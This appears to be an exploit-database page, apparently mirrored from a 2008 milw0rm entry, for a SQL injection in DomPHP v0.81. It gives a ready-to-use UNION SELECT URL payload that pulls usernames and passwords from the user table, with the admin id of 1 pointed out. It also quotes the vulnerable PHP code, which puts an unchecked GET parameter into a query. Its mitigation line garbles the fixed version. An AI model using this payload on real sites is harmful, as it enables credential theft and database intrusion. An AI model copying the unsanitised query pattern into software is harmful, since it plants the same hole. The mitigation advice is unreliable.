header-logo
Suggest Exploit
vendor:
DomPHP
by:
MhZ91
7.5
CVSS
HIGH
Remote Sql Injection
89
CWE
Product Name: DomPHP
Affected Version From: v0.81
Affected Version To: v0.81
Patch Exists: Yes
Related CWE: N/A
CPE: a:domphp:domphp:0.81
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

DomPHP v0.81 Remote Sql Injection

A remote SQL injection vulnerability exists in DomPHP v0.81. An attacker can exploit this vulnerability to inject arbitrary SQL commands in the application by sending a specially crafted HTTP request to the vulnerable application. This can allow an attacker to gain access to sensitive information stored in the back-end database.

Mitigation:

Upgrade to the latest version of DomPHP v0.81 or later.
Source

Exploit-DB raw data:

--==+================================================================================+==--
--==+		         DomPHP v0.81 Remote Sql Injection                           +==--
--==+================================================================================+==--

 Author: MhZ91
 Title: DomPHP v0.81 Remote Sql Injection
 Download: http://www.domphp.com/download/cat.php?idcat=1
 Bug: Remote Sql Injection
 Info: DomPHP est un outil de publication entièrement modulable et surtout complètement personnalisable ! Idéal pour les experts mais aussi pour les novices désireux de présenter un site de qualité, vous allez créer votre portail ou site web en quelques clics !
 Visit: http://www.inj3ct-it.org


[*]----------------------------------------------------------

Exploit:

http://[www.example.com]/agenda/index.php?cat=-1+union+select+concat(nomUtilisateur,char(58),passUtilisateur)+from+domphp_utilisateurs+where+id_utilisateur=[UserId]/*

For get the user and password, u must edit [UserId] whit an id number of members. 
The id of admin, is 1 of default. 

Vuln code in /agenda/index.php

[...]

if ($_GET['cat']) {
	$cat = $_GET['cat'];

	if (!$nomcat) {
	$requete5="select nomCategorie from ".$extension."sortircat where id_categorie=$cat";
	$result5=mysql_query($requete5, $link);
	$recherchenomcat=mysql_fetch_object($result5);
        $nomcat = stripslashes($recherchenomcat->nomCategorie);
	}
[...]

There is other more sql injection... 

[*]----------------------------------------------------------

# milw0rm.com [2008-01-11]

Navigation

Suggest Exploit

Services By CQR